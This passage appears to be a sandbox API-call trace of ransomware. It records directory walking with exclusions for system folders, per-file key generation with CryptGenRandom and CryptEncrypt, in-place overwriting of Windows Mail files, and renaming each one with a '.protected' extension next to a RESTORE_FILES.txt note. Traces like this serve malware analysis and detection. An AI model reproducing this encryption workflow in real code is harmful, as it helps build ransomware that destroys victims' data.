(lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".protected") returned 0x0 [0094.165] lstrcmpW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="RESTORE_FILES.txt") returned -1 [0094.165] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.184] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.185] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 113 [0094.185] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".txt") returned 0x0 [0094.185] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 113 [0094.185] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".rar") returned 0x0 [0094.185] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 113 [0094.185] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".zip") returned 0x0 [0094.185] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2a0, lpOverlapped=0x0) returned 1 [0094.202] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffd60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.202] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2a0, lpOverlapped=0x0) returned 1 [0094.202] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.202] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.203] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.203] CloseHandle (hObject=0x14c) returned 1 [0094.203] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.protected") returned 123 [0094.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.protected")) returned 1 [0094.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.204] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="Windows") returned -1 [0094.204] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="Program Files") returned -1 [0094.204] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="Program Files (x86)") returned -1 [0094.204] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="$Recycle.bin") returned 1 [0094.204] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="System Volume Information") returned -1 [0094.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 113 [0094.204] StrStrIW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".protected") returned 0x0 [0094.204] lstrcmpW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="RESTORE_FILES.txt") returned -1 [0094.204] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.204] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.204] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 113 [0094.204] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".txt") returned 0x0 [0094.204] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 113 [0094.205] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".rar") returned 0x0 [0094.205] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 113 [0094.205] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".zip") returned 0x0 [0094.214] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x6c8, lpOverlapped=0x0) returned 1 [0094.225] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff938, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.225] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6c8, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x6c8, lpOverlapped=0x0) returned 1 [0094.226] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.226] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.226] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.226] CloseHandle (hObject=0x14c) returned 1 [0094.226] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.protected") returned 123 [0094.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.protected")) returned 1 [0094.227] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.227] lstrcmpiW (lpString1="Backup", lpString2="Windows") returned -1 [0094.227] lstrcmpiW (lpString1="Backup", lpString2="Program Files") returned -1 [0094.227] lstrcmpiW (lpString1="Backup", lpString2="Program Files (x86)") returned -1 [0094.227] lstrcmpiW (lpString1="Backup", lpString2="$Recycle.bin") returned 1 [0094.227] lstrcmpiW (lpString1="Backup", lpString2="System Volume Information") returned -1 [0094.227] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned 64 [0094.227] lstrcmpW (lpString1="Backup", lpString2=".") returned 1 [0094.227] lstrcmpW (lpString1="Backup", lpString2="..") returned 1 [0094.227] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*") returned 66 [0094.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.227] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.227] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.227] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.227] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.227] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.227] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\.") returned 66 [0094.227] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.227] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.227] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.227] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.227] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.227] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.227] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.228] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\..") returned 67 [0094.228] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.228] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.228] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.228] lstrcmpiW (lpString1="new", lpString2="Windows") returned -1 [0094.228] lstrcmpiW (lpString1="new", lpString2="Program Files") returned -1 [0094.228] lstrcmpiW (lpString1="new", lpString2="Program Files (x86)") returned -1 [0094.228] lstrcmpiW (lpString1="new", lpString2="$Recycle.bin") returned 1 [0094.228] lstrcmpiW (lpString1="new", lpString2="System Volume Information") returned -1 [0094.228] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new") returned 68 [0094.228] lstrcmpW (lpString1="new", lpString2=".") returned 1 [0094.228] lstrcmpW (lpString1="new", lpString2="..") returned 1 [0094.228] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\*") returned 70 [0094.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0094.229] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.229] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.230] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.230] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.230] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.230] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\.") returned 70 [0094.230] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.230] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.230] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.230] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.230] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.230] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.230] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.230] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\..") returned 71 [0094.230] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.230] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.230] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.230] lstrcmpiW (lpString1="edb00001.log", lpString2="Windows") returned -1 [0094.230] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files") returned -1 [0094.230] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files (x86)") returned -1 [0094.230] lstrcmpiW (lpString1="edb00001.log", lpString2="$Recycle.bin") returned 1 [0094.230] lstrcmpiW (lpString1="edb00001.log", lpString2="System Volume Information") returned -1 [0094.230] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned 81 [0094.230] StrStrIW (lpFirst="edb00001.log", lpSrch=".protected") returned 0x0 [0094.230] lstrcmpW (lpString1="edb00001.log", lpString2="RESTORE_FILES.txt") returned -1 [0094.230] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0094.230] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0094.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0094.231] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned 81 [0094.231] StrStrW (lpFirst="edb00001.log", lpSrch=".txt") returned 0x0 [0094.231] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned 81 [0094.231] StrStrW (lpFirst="edb00001.log", lpSrch=".rar") returned 0x0 [0094.231] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned 81 [0094.231] StrStrW (lpFirst="edb00001.log", lpSrch=".zip") returned 0x0 [0094.231] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0094.250] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.250] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0094.250] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.250] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0094.251] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0094.251] CloseHandle (hObject=0x154) returned 1 [0094.261] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.protected") returned 91 [0094.261] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log.protected")) returned 1 [0094.262] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.262] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Windows") returned 1 [0094.262] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files") returned 1 [0094.262] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files (x86)") returned 1 [0094.262] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="$Recycle.bin") returned 1 [0094.262] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="System Volume Information") returned 1 [0094.262] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore") returned 95 [0094.262] StrStrIW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".protected") returned 0x0 [0094.262] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="RESTORE_FILES.txt") returned 1 [0094.262] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0094.262] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0094.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0094.262] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore") returned 95 [0094.262] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".txt") returned 0x0 [0094.262] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore") returned 95 [0094.262] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".rar") returned 0x0 [0094.262] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore") returned 95 [0094.262] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".zip") returned 0x0 [0094.262] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.285] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.286] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0094.288] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0094.288] CloseHandle (hObject=0x154) returned 1 [0094.289] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore.protected") returned 105 [0094.289] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore.protected")) returned 1 [0094.289] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.289] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Windows") returned 1 [0094.290] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files") returned 1 [0094.290] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files (x86)") returned 1 [0094.290] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="$Recycle.bin") returned 1 [0094.290] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="System Volume Information") returned 1 [0094.290] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat") returned 84 [0094.290] StrStrIW (lpFirst="WindowsMail.pat", lpSrch=".protected") returned 0x0 [0094.290] lstrcmpW (lpString1="WindowsMail.pat", lpString2="RESTORE_FILES.txt") returned 1 [0094.290] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0094.290] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0094.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0094.290] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat") returned 84 [0094.290] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".txt") returned 0x0 [0094.290] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat") returned 84 [0094.291] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".rar") returned 0x0 [0094.291] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat") returned 84 [0094.291] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".zip") returned 0x0 [0094.291] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 